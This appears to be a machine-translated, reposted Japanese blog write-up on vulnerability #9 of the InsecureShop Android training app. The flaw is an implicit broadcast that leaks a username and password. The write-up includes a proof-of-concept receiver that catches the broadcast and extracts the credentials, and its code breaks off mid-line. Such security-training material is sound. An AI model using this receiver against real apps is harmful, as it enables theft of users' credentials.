【Androidセキュリティ】insecureshop脆弱性マイニング - その2

プログラミング 2024-01-09 01:45:44 訪問数: null

目次

脆弱性 #9 - 暗黙的な意図を使用して機密データを含むブロードキャストを送信する

1. 脆弱性分析

AboutUsActivity.class では
、アクションを通じてブロードキャストが暗黙的に送信され、コンテンツがユーザー名とパスワードであることがわかります。
ここに画像の説明を挿入します
これはどのようにして onSendData がトリガーされるのでしょうか? ソース コードをもう一度確認して、現在のソース コード ファイルに直接呼び出しがないことを確認してください。 。

他の場所で呼び出しが行われている可能性があります。レイアウト ファイル activity_about_us.xml を確認してください。
レイアウト ファイルでは、ボタン要素の onclick イベントが onSendData メソッドに関連付けられています。
ここに画像の説明を挿入します

2.pocライティング

2.1 poc Android apk targetSdkVersion <=25 - 依存関係リストで宣言されています

如果目标targetSdkVersion <=25
暗黙的なブロードキャストを受信したい場合は、androidManifest.xml で登録を宣言できます。

<receiver>
    android:name=".vul_broadcastReciever.MyReceiver"
    android:enabled="true"
    android:exported="true">
    <intent-filter>
        <action android:name="com.insecureshop.action.BROADCAST"/>
    </intent-filter>
</receiver>

MyReceiver.class

public class MyReceiver extends BroadcastReceiver {
   
    
    

    @Override
    public void onReceive(Context context, Intent intent) {
   
    
    

        if (intent != null){
   
    
    
            String action = intent.getAction();
            if ("com.insecureshop.action.BROADCAST".equals(action)){
   
    
    
                String username = intent.getStringExtra("username");
                String password = intent.getStringExtra("password");

                if (username != null && password != null ) {
   
    
    
                    // 通过显示intent发送数据到activity中
                    Intent intent1 = new Intent(context,Vul_getDataFromBroadcast.class);
                    intent1.putExtra("username",username);
                    intent1.putExtra("password",password);
                    context.startActivity(intent1);
                }
            }
        }
    }
}

Vul_getDataFromBroadcast.class

// 接收数据
String username = getIntent().getStringExtra("username");
String password = getIntent().getStringExtra(&#

おすすめ

転載: blog.csdn.net/tyty2211/article/details/134591385
おすすめ
NetBSD は AI によって生成されたコードの提出を禁止します
ランキング
C#の変数インスタンス、クレジット・カードケース
通过uniCloud白捡一个在线图库管理工具
Linuxのいくつかの基本的なコマンドに関する洞察(20ベース)
vueエントリーの基礎知識、コア知識をマスターするならこの記事で十分
食品化学クエスチョンバンク
CentOSの7制御システムは、ファイルを占めます
単一の el-form 内の el-form-item テキストの左揃えを解決する方法
ノードJSベースノート
関数にSQL Serverの文字列:
sparksql_相関分析
アーカイブ
もっと
2024-05-18(30)
2024-05-17(6)
2024-05-16(24)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(27)
2024-05-11(31)
2024-05-10(33)
2024-05-09(30)

コードワールド

© 2018 codetd.com